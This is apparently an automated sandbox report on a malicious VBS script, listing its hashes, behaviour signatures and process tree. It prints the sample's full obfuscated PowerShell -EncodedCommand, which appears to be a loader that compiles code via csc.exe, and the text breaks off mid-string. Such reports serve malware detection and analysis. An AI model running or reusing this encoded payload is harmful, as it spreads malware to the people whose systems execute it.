9629ddea649ce511246c959915ad102d25b3f616e4a4501bab4358895b38a913

General

Target

№337740.vbs
Size

139KB
MD5

95c74f0df0282a10ba41f279741f39b0
SHA1

7dcf489ca3e3ba7325f3aa9f99aac908aa02c6d8
SHA256

9629ddea649ce511246c959915ad102d25b3f616e4a4501bab4358895b38a913
SHA512

c9e743d98767dfc476e56dcd6d0346e4e31c4853fed26670e72498a83eef39cda1c0debc2a50e6c27c9072ae910c0eeffda034c6f4b306537a2859983fc19e10
SSDEEP

3072:05ksEf25PvksR3zlbbjjPrCZYF81apKPya7cZ8ZN:Z2xLVnum81aAyoJ

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
852	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	852	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1976 wrote to memory of 852	1976	WScript.exe	26
PID 1976 wrote to memory of 852	1976	WScript.exe	26
PID 1976 wrote to memory of 852	1976	WScript.exe	26
PID 1976 wrote to memory of 852	1976	WScript.exe	26
PID 852 wrote to memory of 1916	852	powershell.exe	28
PID 852 wrote to memory of 1916	852	powershell.exe	28
PID 852 wrote to memory of 1916	852	powershell.exe	28
PID 852 wrote to memory of 1916	852	powershell.exe	28
PID 1916 wrote to memory of 2044	1916	csc.exe	29
PID 1916 wrote to memory of 2044	1916	csc.exe	29
PID 1916 wrote to memory of 2044	1916	csc.exe	29
PID 1916 wrote to memory of 2044	1916	csc.exe	29

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\№337740.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABHAGEAcwBsAGkAZwBoACAAPQAgAEAAJwANAAoARgByAG8AawBvAEEATABzAGsAZQBkAGQAUgBhAGQAaQBvAGQATABhAHoAZwBhAC0AVABhAG4AawBlAFQAVABhAHAAcgBlAHkAUwBjAGgAaQB6AHAASABlAHIAbQBhAGUASQBuAHQAZQBuACAAUgBlAGQAZQBsAC0AUgBlAHYAZQByAFQAQwBhAGIAaQBuAHkAUwBwAHUAbQBvAHAAQQBsAGwAbwByAGUARABkAHMAcwBwAEQAQQBrAHQAaQBlAGUAVQBuAHYAbwBjAGYAYQB1AGQAaQBlAGkATQBhAG4AbwBtAG4ATABlAHAAdABvAGkARgByAGkAdgBvAHQAVABpAGwAbABiAGkATQBvAHQAbwByAG8AUwBhAGQAZQBsAG4ARwB1AGwAcABlACAARABlAHMAZQByAEAAUgBlAGEAZABqACIACgBXAG8AcgBrAGwAdQBpAG4AZABvAGsAcwBNAGIAZQBsAHAAaQBTAHQAaQBsAGsAbgBTAHAAbwByAHQAZwBTAHQAYQByAHQAIABJAG4AbgBvAGMAUwBVAG4AYwB1AG0AeQBMAHkAbQBwAGgAcwBEAHIAaQBuAGsAdABDAGEAbAB5AGMAZQB0AGEAcgBhAHgAbQBzAGgAYQB3AHkAOwAKAEUAbABlAG0AZQB1AEYAaQBkAGUAbABzAEMAaABhAHMAdABpAEEAcgBiAGUAagBuAEgAbwBpAHMAZQBnAFQAeQByAGUAbgAgAE8AcgBpAGUAbgBTAGwAaQBuAGcAYgB5AEMAbwB1AG4AdABzAFMAdABhAGIAaQB0AEIAcgBvAGQAZQBlAE0AbwBkAGUAbABtAHMAcABvAG4AZwAuAFQAcgBpAHAAZQBSAEUAZwBlAG4AcwB1AEgAbwB2AGUAZABuAHMAZQBiAHUAbgB0AEMAYQBsAGwAbwBpAEIAbwB0AGEAbgBtAFQAbwBwAGEAegBlAFAAaQByAGEAdAAuAE8AdgBlAHIAZABJAFQAeQByAGsAZQBuAEMAYQBtAHMAZAB0AFMAdQByAHIAbwBlAFYAYQBsAG0AdQByAFAAbAB1AG0AZQBvAEIAYQByAGQAdQBwAE4AZwBsAGUAbwBTAEsAbwBvAHQAYwBlAHMAYQBsAGEAdAByAEsAbwBnAGUAZwB2AFoAZQBzAHQAZgBpAFYAbwBsAGMAYQBjAEwAYQB0AGkAcwBlAEwAawBrAGUAcgBzAFAAcgBlAGYAZQA7AAoASgBvAGsAZQBsAHAARQBmAHQAZQByAHUARwByAHUAbgBkAGIAVgBhAHIAZQBkAGwAQwBvAG0AbQBlAGkARABlAHIAcwBvAGMARQBzAHQAcgBhACAATQBpAGMAcgBvAHMAVQBkAGsAbwBiAHQAaAB1AG4AYwBoAGEAUwB5AG0AYgBpAHQATgBhAG0AZQB2AGkATQB1AHMAbABpAGMAUwBlAGwAZQBmACAAUgBhAGkAbgBiAGMAQgBvAHIAZABrAGwATQBhAHMAawBpAGEAQwBhAGMAbwB6AHMASgB1AGcAYQB0AHMARwBpAHQAYQBuACAASgByAGcAYQBzAE8ASwBsAGkAZQBuAHYATAB5AGQAcwBrAGUATgBpAHQAdABpAHIATABvAGcAaQBzADEACgBEAHIAaQBrAGYAewBuAGUAdABlAG8AWwBTAGwAdQBtAHMARABHAGUAbgBsAHMAbABFAHAAaQBjAGUAbABNAGkAcwBlAG4ASQBQAHIAYQBlAHMAbQBTAHkAbgBhAG4AcABCAHIAeQBnAGcAbwBLAHIAdQBkAHQAcgBwAHUAawBsAGUAdABEAHUAbwB0AHIAKABQAG4AZQB1AG0AIgBDAG8AcABwAGkAdwBUAGgAeQByAGUAaQBGAGEAcgB2AGYAbgBQAG8AbAB5AG0AcwBUAGEAZwBlAHQAcABGAHkAcgBzAHYAbwBTAHAAbwBpAGwAbwBCAG8AdQBjAGgAbABSAG8AdAB0AGUALgBWAGkAawB0AHUAZABBAGYAZwByAHMAcgBaAG8AbwBzAHAAdgBCAGwAbwBuAGQAIgBBAGsAdABpAGUAKQBQAGUAbgBnAGUAXQBJAG4AdABlAHIAcABLAGwAYQBtAG0AdQBCAGwAbwBvAGQAYgBNAGkAbgBpAHMAbABEAHkAZgBmAGUAaQBVAG4AZABnAGwAYwBBAG4AdABpAHAAIABTAGUAcgB2AGkAcwBXAGUAbABsAHEAdABBAGkAdgBlAHIAYQBUAG8AZQBuAGEAdABTAGgAbwBzAGgAaQBQAGwAYQBuAHQAYwBzAHUAawBrAGUAIABSAGUAZgBpAG4AZQBTAHQAZQB0AGUAeABhAG4AaQBjAHUAdABEAGEAbgBuAGUAZQBCAGkAbABzAGgAcgBRAHUAZQBlAG4AbgBEAHUAbQBtAGUAIABIAHkAcABvAHMAaQBWAG8AbABhAHQAbgBCAGUAZwBlAGoAdABIAHkAZAByAG8AIABTAHAAZQByAG0ARwBTAGkAZwBuAGEAZQBHAG8AZABzAHYAdABUAG8AbAB1AGUARgBKAHUAcwB0AGUAbwBQAHUAbABwAHcAcgBBAHAAcwBpAGQAbQBNAHkAdABoAG8AKABVAG4AZABlAHIAaQBTAG8AbABmAGEAbgBCAHUAcwBlAG4AdABEAGUAbABpAGsAIABhAHgAbwB0AG8AUwBEAGkAYQBrAG8AawBGAHIAZwBlAGgAcgBNAGkAbABpAGUAaQBBAG4AdABpAGoAdgBEAHUAcABsAGkAZQBQAGEAcgBrAGkALABBAHMAdAByAG8AaQBKAGUAbgBzAHkAbgBTAHQAZQBuAGgAdABOAHMAawBlAGQAIABLAHIAYQBrAGUAUwBNAG8AcgBkAHYAawBPAHgAeQBwAHIAbwBzAHUAYwBjAGUAbABLAG8AcgBlAHQAZQBDAG8AeQBzAHQAZABQAGEAcgB2AGUAMQBLAG8AcwBtAGUANwBKAGEAYwBxAHUANwBGAHIAaQBhAGIALABQAGEAaQByAHAAaQBOAHUAbABsAGUAbgBTAHQAcgBhAG4AdABDAG8AbgB0AGEAIABUAGkAbABlAG0ASwBBAGwAdABpAGMAYQBEAHYAcgBnAGsAcgBBAHQAdAByAGEALABSAGUAZgBvAGwAaQBPAHMAdABlAHIAbgBPAG0AZQBuAGkAdABGAG8AcgBzAHkAIABXAGUAcgBlAGMARQB0AHIAbwBkAHMAdABFAHAAbwBzAGUAcgBCAGEAcgBkAGUALABVAG4AZwB1AGkAaQBNAGUAZABpAGMAbgBHAG8AbABkAGYAdABEAGkAcwBjAGkAIABLAG8AbgB0AHIAVgBUAHkAcABvAG4AaQBIAHUAcgB0AGkAdABMAGEAZwBlAHIAYQBWAGQAZABlAGwAbQBVAGIAZQB0AHYALABEAGkAYQBiAGUAaQBKAG8AbABsAGkAbgBEAGkAcwBjAHIAdABNAGkAbABqAGEAIABQAG8AbAB5AGgAQgBSAHUAbgBkAGgAYQBLAGEAbABlAGkAZwBpAG4AdABvAHIAdABNAHUAbAB0AGkAYQBDAG8AbQBtAGUAbABLAHYAbwB0AGUAKQBCAGUAcwBrAHIAOwAKAFMAYwB1AGwAbABbAE4AbwBuAGEAcwBEAE8AcABsAHMAcwBsAEUAbgBjAGgAaQBsAFMAawBvAHYAbABJAEYAbwByAGgAaQBtAFQAcgBpAGsAbwBwAEIAbwByAHQAbwBvAEwAaQBuAGcAdQByAFQAaABhAGwAYQB0AFQAYQBuAGQAZQAoAFcAYQBtAGIAbAAiAEMAaABhAGUAdABzAEQAcgBhAGcAbwBoAEMAbwBtAHMAeQBlAFMAdQB0AHQAZQBsAEUAYQByAHQAaABsAEcAbAB5AGMAbwAzAGQAaQBzAGgAZQAyAFEAdQBhAGQAcgAuAFIAZQBpAGMAaABkAEEAZgB0AGUAbgBsAFUAbQBvAHIAYQBsAE0AYQB0AHIAaQAiAEIAYQBnAGgAYQApAE4AbwBuAGIAbwBdAEQAaQBwAGgAdABwAFIAbwBkAHIAaQB1AFAAaABvAHQAbwBiAFUAbgB0AHIAYQBsAEIAcgBvAG0AaQBpAEIAbwBlAHQAaABjAEIAaQBtAHAAbAAgAGQAbwBtAG8AcgBzAFMAbQBpAGQAZwB0AFIAZQBzAHQAYQBhAHAAYQBkAGwAZQB0AEIAbABlAGcAZgBpAFIAZQB0AHIAaQBjAEEAYwBvAHUAYwAgAEMAaABhAHIAbABlAEwAdQBuAHQAZQB4AEEAbAB1AG0AaQB0AEEAbgBnAGkAbgBlAFAAbABhAGkAYwByAEYAbwByAHQAeQBuAEQAbwBsAGwAYQAgAEYAbABsAGUAcwB2AE0AZQBsAGwAZQBvAFAAaQB0AGgAZQBpAGQAZQBnAGUAbgBkAEsAbgBrAGYAbAAgAEYAbwByAHMAawBTAHQAZQByAHIAbwBIAE0AbwBzAGUAaABGAEYAcgBhAGsAdAByAEYAbwByAHMAawBlAEkAbgB2AG8AbABlAFMAawBkAGUAcwBOAE8AYgBvAGwAdQBhAFMAaQBuAGcAbABtAFUAbgByAGEAbgBlAFUAZAByAGUAZwBNAG8AcABzAHAAYQBhAFQAcgBpAGcAbABwAEQAbwBnAG0AYQBwAEgAbwB2AGUAZABpAFIAYQB1AGsAbABuAEEAYwBoAGwAbwBnAFYAZQByAGQAZQBzAEsAcgBpAG0AbQAoAEEAbAB0AGkAbgBpAGcAYQBiAGYAZQBuAFMAdABpAGsAawB0AEkAbgBjAG8AbQAgAFQAaAB5AHMAYQBTAEQAcgBvAHMAawBvAEYAbABhAGcAZQBsAE8AdgBlAHIAZABpAFQAaQBsAHIAZQBkAFQAbwByAG4AZQBpAEwAYQBrAHIAaQAyAFQAaQBsAGsAbwA5AFMAdABlAG4AYgApAEUAdABoAG8AbAA7AAoAWAB5AGwAbwBmAFsATwB1AHQAcwBpAEQARABvAGsAdQBtAGwAZABhAG0AcABlAGwARQB2AGUAbgBoAEkASQBuAGQAcwBtAG0ARABhAHQAYQBzAHAAQwBvAG4AcwBjAG8AZwBlAG4AYgByAHIAVQBuAGQAZQByAHQAbgBlAHIAZABoACgATgBvAGsAawBlACIATQBvAG8AZABpAHUASQBuAHQAZQByAHMAQgBhAHIAZQByAGUATQBhAG4AZwBvAHIAQQBsAHAAYQBiADMAVABhAHAAcABlADIAUwBrAHIAbwB0ACIATQBhAHIAbQBvACkAQQBtAHQAcwB0AF0ATgBvAG4AYQBwAHAAUgB1AG4AZABzAHUAQQBnAHUAZABpAGIARgByAGEAZwBhAGwAVwBpAHMAaABiAGkARABlAHIAYwBvAGMASABlAGYAdABpACAAVQBzAHkAbgBsAHMAVQBwAHQAaQBlAHQAUwBvAGQAYQB2AGEAVABlAG4AZABvAHQATABpAGcAZQBkAGkARgBvAHIAcwBpAGMATQBpAG4AZABlACAASwBvAG4AdABvAGUAQgBsAG8AdwBmAHgAQQBuAHQAeQBkAHQAUABsAGEAdABvAGUARgBlAHIAbQBlAHIATABlAHcAbgBpAG4AUwBjAG8AbwB0ACAATQBpAHMAcABlAGkAQwByAGkAYgBiAG4AUgBlAGoAcwBlAHQATABhAG4AZwBzACAAQwBhAHIAYQBjAEMAbwBmAGYAZQByAHIAUAByAGUAYgBsAGUAUwBhAGEAcgBlAGEAUwB0AHkAcgB0AHQASAB5AGQAcgBvAGUARgBlAGIAZQByAEQAVABhAG4AZAB0AGkARgBvAHIAbABhAGEAUwBrAHIAdQBkAGwAUgBhAGQAaQBhAG8AQQBmAGYAYQBsAGcAYQBmAHYAaQBrAFAAUABhAHMAdABlAGEAYQBsAGIAdQBxAHIAYgBlAGEAbQBpAGEAVABpAHAAbABvAG0ASQBzAGEAbABsACgASABhAGwAdABlAGkARgBvAHIAdQByAG4AVQBuAHMAbgBhAHQAUABhAHIAdABzACAAYgBpAHIAawBlAEsATgBpAGcAaAB0AGkAUABvAGQAZQB2AGwAQgBhAHIAZABlACwAQwBoAHIAZQBzAGkAQgBvAHIAdABhAG4AcAByAGUAcwBzAHQAVQBuAHMAbABhACAAUwBrAHUAcgBrAEIAVABoAGkAYwBrAGwAQgBpAHMAdABhAGEAYQByAG0AZQBuAGIATgBhAHQAaQBvAGIAUwBrAGEAcgB2AGkAUAByAG8AcABhADEATQB1AHIAbQB1ADcAUgBhAGMAYwBvADUARgByAGUAcgBiACwAQgBvAHIAZwBlAGkASgBvAHMAaABpAG4AUABhAGMAaAB5AHQAUwBlAGwAZQBuACAARgBsAGkAZwBoAFQARAB5AGIAZABlAHYAUwBlAGwAZABvAGEAUgBpAHAAZQBsAG4ARABhAHQAYQBtACwASwBuAGUAYQBkAGkAUABhAHIAYQBwAG4ATQBvAHIAZABlAHQAZwBhAHMAbQBhACAATwBwAGkAbgBpAFYARgBvAHIAZQB2AGkASABvAG0AbwBnAGcASQByAHIAZQBtAGEAUgBlAGoAbwBsACwATQBhAHAAcABlAGkATgBvAG4AcwB1AG4ATQBhAHIAYwBpAHQAagBpAGcAZwBlACAAZQByAGkAbgBkAE0ARQBuAHMAcAByAG8AbQBpAHMAYQBuAG4AUAByAG8AYgBhACkATAB1AHIAaQBrADsACgBBAGMAYQByAGkAWwBFAGMAYgBvAGwARABEAGkAcwBpAG4AbABCAHkAZwBnAGUAbABTAGEAdQB0AGUASQBzAHQAaQBuAGsAbQBTAHQAaQBsAGwAcABCAG8AZwBzAGsAbwBQAGgAcgBhAGcAcgBCAGwAbwBkAHQAdABCAG8AcgBlAHUAKABSAGUAbABhAHgAIgBvAHYAZQByAGwAawBTAGYAbwByAGsAZQBBAGwAbQBzAGcAcgBJAG4AcwB0AHIAbgBIAG8AcgBuAHAAZQBTAGsAeQBkAGUAbABJAG4AaABlAHIAMwBCAHUAZwB0AGgAMgBTAHUAaQBzAHQAIgBBAG4AawBvAG0AKQBTAG8AdQBrAHAAXQBTAGUAcAB0AGUAcABVAHIAbwB2AGEAdQBJAG0AcAByAGEAYgBMAGEAbgBnAHMAbABGAHIAdQBtAHAAaQBSAGUAYgBvAHUAYwBEAGEAdABhAGUAIABUAGUAbwByAGkAcwBBAGwAbABvAHQAdABTAHUAYgBjAHUAYQBPAHYAdQBsAGkAdABPAHIAZABrAGwAaQBzAHAAaQBmAGwAYwBTAGEAbQBsAGUAIABTAGEAbABnAHMAZQBGAGUAbABkAGkAeABCAGEAawBrAGUAdABBAG4AdABpAHEAZQBTAHUAYgBvAGIAcgBMAGUAZwBlAG4AbgBiAHIAbwBkAGUAIABUAGEAbgBpAHMAdgBHAGkAdgBpAG4AbwBDAGkAdgBpAGUAaQBEAGkAbwBsAGUAZABFAGMAaABlAHYAIABTAHAAaQBzAGUARwBUAG8AbAB1AGUAZQBVAG4AcwBsAGUAdAB0AHkAcABlAHMAUwBNAGEAbgBvAG0AdABEAGkAcwByAGUAYQBCAGkAbABsAGkAcgBUAHIAbwBwAG8AdABPAHAAZwBhAG4AdQBIAHUAbgBkAHIAcABCAGUAbgB6AG8ASQBNAGkAZABzAHQAbgBzAGwAaQBiAGIAZgBGAGoAZQByAG4AbwBQAHMAZQB1AGQAKABUAG8AbQBtAGUAaQBBAG4AdABlAG4AbgBUAHMAZQBhAGcAdABVAGQAYgB1AGQAIABzAGUAawB0AGUAVABLAG4AZQBiAGUAYQBCAHUAZABnAGUAcgBtAGkAbgBkAHIAbQBJAGQAbwBsAG8AMQBGAHIAcABlAHIAMQBTAGEAawByAG8ANABBAGQAcgBlAG4AKQBLAG8AZABuAGkAOwAKAEUAcgBvAGIAcgBbAFcAaABlAHIAZQBEAFMAYQBuAGkAdABsAEsAaQBuAGQAbABsAFMAawBhAGsAdABJAG4AZQB3AHMAYQBtAFkAdAB0AHIAaQBwAFYAZQBqAGEAcgBvAEIAZQBmAHIAeQByAFMAdAB5AHAAcwB0AEUAagBsAGUAcgAoAE0AbwBpAHIAZAAiAE4AYQByAGMAbwB1AFMAbAB1AGIAYgBzAGYAbABpAHIAdABlAE0AYQBzAGsAaQByAEIAYQBnAHMAbQAzAFIAYQBhAGQAcwAyAE0AYQBuAGYAdQAiAEcAYQBuAGEAbQApAFYAZQBqAGsAcgBdAE0AZQB0AGUAbgBwAFIAZQBkAGkAZwB1AE0AZQByAHIAZQBiAGYAbwBuAGUAdgBsAEIAbABvAGQAYQBpAEEAbgBtAGUAbABjAFYAaQBsAGoAZQAgAE4AYQB0AHQAZQBzAFIAZQBwAHUAYgB0AE8AdgBlAHIAYgBhAHMAZQBrAHMAdAB0AFUAbgBkAGUAcgBpAEUAZwBhAGQAcwBjAFIAZQBzAHAAaQAgAE0AYQBuAGsAbwBlAFUAbgB3AGkAbgB4AEsAYQBsAGsAawB0AEEAcwBzAGkAbQBlAE8AcgBhAHIAaQByAEIAbwB5AGEAcgBuAHUAbgBhAGcAZwAgAEYAbwBsAGsAZQBpAE0AYQBjAHIAbwBuAEYAbABvAGsAaQB0AFMAbwBsAHMAawAgAEIAaQB6AGEAcgBDAFUAbgBuAGkAdAByAEUAdgBlAGwAeQBlAE8AYgB0AGUAbgBhAEIAbwByAGQAdgB0AGcAYQBzAHIAYQBlAEIAaQBmAGEAbABJAEEAYgBvAG4AbgBjAEQAbwBsAGkAYwBvAEEAbABvAGMAaABuAFMAbgBhAGsAcwBJAFAAcgBhAGsAdABuAEQAaQBzAHQAcgBkAFYAZQBqAHAAbABpAEkAbgBmAHIAYQByAHMAawB1AG4AawBlAE4AaQBoAGkAbABjAEgAeQBwAG8AdAB0AFQAbwBuAG4AaQAoAEQAdQBsAGMAaQBpAEkAcwBzAHUAZQBuAFQAcgBhAGcAZQB0AEEAcgBnAG8AdgAgAFUAbgBpAG4AcwBEAEsAYQBuAHUAdABhAG8AcgBuAGEAbQByAEYAcgBlAGQAbgBrAEcAbwB1AHIAbQAxAFMAbwB1AG4AZAA2AEIAdQB0AGMAaAA3AEUAeAB0AHIAYQApAEwAbwBiAG8AbAA7AAoATgBhAHQAaQBvAFsAVABlAGsAcwB0AEQAUABhAHIAYQBsAGwAUwB0AGkAYwBrAGwAQwBsAHkAcABlAEkAYwBoAGEAZQB0AG0AUgBhAHAAbgBkAHAAVgB1AGcAZwBlAG8ASgB1AHMAdABsAHIARwBvAHUAZAB5AHQARgBlAGQAdABlACgAYgBlAHQAeQBuACIAVAByAGEAYwBoAHUARABlAHQAcgB1AHMAVQBuAGIAcgBlAGUAVQByAGkAbgBvAHIARABqAHYAbABlADMARABpAHMAdABhADIAUwB1AHAAZQByACIASwBvAGwAbABlACkATABlAGQAZQBsAF0ASABlAGwAbABpAHAAUgBvAHQAdABlAHUATQBhAGgAbwBnAGIAUwBrAGEAZQByAGwARABpAHMAZgBhAGkAQgBqAGUAcgBnAGMAVgBlAHIAbQB1ACAAVABoAHUAbgBkAHMAWgB5AGcAbwBtAHQARgBhAGMAcgBkAGEAcABhAHIAbgBhAHQAVQBkAHMAeQByAGkASQBuAHQAcgBlAGMAQgBzAHMAZQBrACAAUwBpAGQAZQByAGUATwB2AGUAcgBlAHgAQgBpAHMAbQBlAHQASwBhAHIAdABlAGUAQQBnAGkAdABlAHIAUwBsAGkAawBwAG4AQQBmAGcAaABhACAAUAByAG0AaQBzAGkATQBlAGQAcABsAG4AUAByAGUAcwBwAHQATQBhAHIAcwBrACAAUABsAGUAbgBzAEcATQBhAHYAZQBkAGUAVgBhAHMAaQBsAHQAVABhAG0AZQByAEQAVQBkAGcAYQB2AGwASgBhAGcAcwBjAGcASABpAGUAbABhAEkAUwBrAGkAYgBzAHQAVABlAG4AZABlAGUAUgBlAHAAZQByAG0ASABhAGEAbgBkAEkAVAByAHkAZwBnAG4ASQBuAGcAYgBlAHQARwByAGEAYQBuACgAQQBmAGwAaQByAGkARwB1AG4AcwBtAG4AQQBuAG4AZQBtAHQATAB1AGYAZgBhACAAUwB5AHYAcwB0AEQARgBvAHIAdQByAGkAUABzAGUAdQBkAG4ARwByAHUAbgB0AG8AbwBtAHYAdQByAHMAcABsAGEAeQBsACwARABlAGMAaQBtAGkAQQBmAHMAZQBuAG4AUwB0AGUAbgB0AHQARQBmAHQAZQByACAATgBlAG0AYQB0AFMAVQBuAHMAaQBtAHYAUwBtAGEAYQBmAGkAUwBpAGwAdgBlAGcATQB5AG8AcwB5AGUAVQBuAHMAbwBwAHIAUwB1AGIAbwByACwATABhAGUAcwBlAGkAVQBkAHAAbgBzAG4AVgBpAHIAYQBzAHQAUwBvAGwAZwB1ACAAcwB0AHYAaAB0AEEARABpAGEAZwByAHQASwBvAGQAZQBzAGgARwBhAHUAZABpAGwAUwB5AG4AbwBuACwAVgBpAGQAdQBuAGkAUwBlAGsAdQBuAG4AQQByAG4AdQBzAHQARABlAG4AcwBpACAASQBuAHQAZQByAFIATABlAHAAaQBkAG8ARAB5AHIAZQB0AGsAVAByAGkAbABsAGsASABpAGQAaAByAGUAWgBvAG8AZgB5AHIARgBvAHUAbABzACkASABqAGUAcgB0ADsACgBCAGkAZgBhAGwAWwBCAGEAbgBnAGsARABBAHMAdwBpAG0AbABJAG4AdABlAHIAbABUAGkAbgBkAGkASQBDAGEAZgBmAGUAbQBiAGEAbAB0AGUAcABMAGUAbgBpAGUAbwBXAG8AbABmAHIAcgBTAHQAbgBrAHMAdABEAGUAYgBvAHIAKABPAHUAdABjAHIAIgBNAGEAdABlAHIAdQBSAGkAZABlAGIAcwBrAGwAaQBzAHQAZQBDAGUAbgB0AGkAcgBWAGEAcgBtAGUAMwBGAGwAbwB0AHMAMgBCAGUAbgBiAHUAIgBLAGEAcwBzAGEAKQBCAGkAdABpAG4AXQBEAG8AawB1AG0AcABCAHIAbwBwAGUAdQBQAHIAZQBiAGUAYgBMAG8AdgBvAHYAbABDAGEAbQBvAHUAaQBSAGUAZwBpAG8AYwBFAG4AagBvAGkAIABTAGkAbQB1AGwAcwBBAGYAbQBpAGwAdABGAGwAdQBvAHIAYQBMAHMAcgBpAHYAdABLAGwAdQBuAHQAaQBWAGkAawB0AHUAYwBTAHQAaQBnAGUAIABVAGQAbABpAHMAZQBIAGUAbQBtAGUAeABUAGUAbABlAHgAdABQAHIAaQBtAHMAZQBJAHMAZABlAHMAcgBJAG0AcABsAGEAbgBCAGEAZwBsAGEAIABWAGEAYQBnAGUAaQBUAGEAcgB0AGUAbgBDAGUAbQBlAG4AdABNAGUAdABhAGcAIABVAGIAZQBzAGsASQBDAGgAcgBvAG0AcwBrAGUAeQBwAHIAWgB0AGkAbgBlAGEAbwBIAGEAYQBuAGQAbwBJAG4AZABsAGcAbQBQAHIAbwBwAG8AZQB0AHIAZQBtAHUAZABOAG8AbgBhAHAAKABGAGkAbAB0AGUAaQBQAG8AYwBrAG0AbgBwAHIAYQBnAHQAdABQAGwAZQBiAGUAIABBAHAAcwBpAHMARABJAG4AdgBlAG4AYQBHAHIAZQBuAGUAZABTAGsAYQBsAGEAKQBMAGkAdgBzAG0AOwAKAFQAbwBtAGgAZQBbAHMAbwBwAGgAaQBEAEEAbgBlAHAAaQBsAEEAYwBhAHIAbwBsAEMAbwBuAHQAYQBJAFAAcgBvAHMAaQBtAEIAZQBmAHIAdQBwAFMAYwBlAG4AZQBvAEEAcgBjAGEAZAByAFAAcgBpAG0AdQB0AFAAaABpAGwAbwAoAE0AYQBsAGUAcwAiAEcAcgB1AHAAcABrAEIAcgBlAHYAcABlAEEAbQBiAGkAdAByAE8AcABmAGEAdABuAFIAZQBkAG4AaQBlAEYAcgBlAGsAdgBsAFMAdABlAGoAbAAzAEgAeQBkAHIAbwAyAEYAbABlAHIAdAAiAHUAbgBlAG0AZQApAEsAbwBuAHQAbwBdAEQAaQBwAGwAbwBwAFIAZQBsAGUAdgB1AEwAbwBiAHMAYwBiAFMAdAB2AGIAbwBsAFQAaQBsAHMAdABpAFMAawB1AG0AcgBjAFUAbgB0AGkAbAAgAFAAbABhAHMAbQBzAFYAYQByAGkAZgB0AEYAcgBhAHMAbwBhAEIAYQBnAGwAbwB0AE0AYQBsAHQAYQBpAFIAbwBxAHUAZQBjAEEAbgBkAGEAbAAgAEwAdQBkAGUAZABlAEsAbABhAHQAdAB4AEwAYQBrAHIAaQB0AFMAdABhAHIAdABlAHUAbgBoAGUAcgByAEQAZQBmAG0AcgBuAEwAYQBuAGQAcwAgAFQAZQBhAHIAYQBpAEQAYQB0AGEAZgBuAE0AYQByAGcAYQB0AEkAbgBkAGUAcgAgAEQAZQBjAGUAbgBWAFMAcABvAG4AcwBpAEYAcgBlAG0AcwByAFMAaQBuAGsAcwB0AEUAawBzAG8AdAB1AEYAbwByAHMAawBhAFMAdQBiAG0AZQBsAEYAcgBhAHQAcgBBAEYAbwBvAGwAaABsAFYAYQBjAGMAaQBsAEMAbwByAGsAcwBvAFQAaABlAG8AbQBjAHMAdgBhAGoAbgAoAFAAZQBwAGUAcgBpAEIAZQBzAHQAaQBuAEIAYQBuAGsAcAB0AFQAcgBvAHMAZgAgAEIAYQBnAGcAcgB2AEkAbgBkAGUAdAAxAFQAagBlAG4AZQAsAFMAaQBnAG4AYQBpAFIAbwBtAGEAbgBuAE0AdQBsAHQAaQB0AFYAYQBlAHIAZQAgAEYAaQBzAHMAZQB2AEEAZwBpAHQAYQAyAEgAYQB1AGwAYQAsAGEAYwByAG8AdABpAE0AaQBzAHIAZwBuAFIAdQBuAG4AaQB0AEwAZQB0AG0AZQAgAEEAZwB0AGUAcgB2AFAAaQBzAHQAYQAzAE0AYQBzAGsAZQAsAEEAYQBsAG4AZABpAFYAbwBsAGQAdABuAE4AbwBuAGQAaQB0AEsAbwBuAGYAZQAgAEsAZABiAGoAZQB2AFIAZQBuAHQAZQA0AEkAbgB0AGUAcgApAE0AYQBuAGgAYQA7AAoATABlAGoAcgBzAFsAUwBlAHAAdABlAEQAVAB1AGYAZgBjAGwAUAB1AG4AYwB0AGwASAB5AGQAcgBhAEkAUAByAGEAeABpAG0ASwBvAHIAdQBuAHAAUAB1AHAAaQBsAG8AWABhAG4AdABoAHIAQQBsAHAAaABlAHQAUwB5AG4AawByACgAQwBvAGQAZgBpACIAUwBtAGEAbABmAGsATwBwAHQAcgB5AGUASgBlAHIAbwBuAHIAVAByAGkAYwByAG4AUwBrAHIAYQBiAGUAUwBjAGEAZwBsAGwATwBtAG0AZQBzADMAQgBhAG4AZABzADIASABlAGwAaQBwACIASAB5AHAAZQByACkAUwB0AGEAbgBsAF0ASQBtAHAAYQBnAHAATABhAG4AYwBlAHUAQQBtAGEAZwBlAGIAdgBlAGQAawBlAGwARgBvAHIAZAByAGkAZQB1AHIAaABvAGMASgB1AHMAdABpACAARgBvAHIAbQBhAHMAUwB1AGIAYwBlAHQATwBrAHQAYQB2AGEAVABpAGQAcwBzAHQAUAByAGUAYQBzAGkAUwBlAG0AaQBkAGMAQgBhAGMAawBjACAAbQBhAHIAbABvAGUAQgBpAGQAcgBhAHgAVQBmAG8AcgBuAHQAQwBhAHAAZQBsAGUASQBuAGoAdQByAHIAUwBrAHUAbABsAG4AUwB1AHAAZQByACAAQQBmAHIAaQBnAEkAVAByAGEAcABlAG4AQQByAG0AYgByAHQATgBzAHQAYgBlAFAARgBvAHIAcwB2AHQAYQBmAGgAcwB0AHIAUwBhAG0AbQBlACAAUAByAG8AbQB1AEUAVABvAGwAcwBlAG4ARwBhAHkAbgBlAHUARgB1AG4AZABoAG0ASgBvAHUAcgBuAFMAQQB0AG8AbQB0AHkAQgBvAHMAZQBsAHMAUwBpAGIAYgBlAHQARgBhAGkAcgBmAGUAUwBuAGEAawBlAG0AVABlAGsAcwB0AEwARgB1AGwAZAB0AG8ARgBvAHIAcwBvAGMARgBvAHIAbgB5AGEARgBvAHIAYgBlAGwAQQBmAGIAcgB5AGUAQgBpAGIAbABpAHMATgBhAGEAZABlAEEAVQBkAHQAcgBhACgATgBvAG4AZgBvAHUAQwBhAHAAaQB0AGkAUwB1AG4AZABoAG4ARwBhAHMAdQBuAHQAUwBwAGUAYwBpACAAQgBsAG8AZAB0AHYAUABoAGEAbABhADEAVABlAHIAcgBhACwARwByAHUAbgBkAGkASwB1AG4A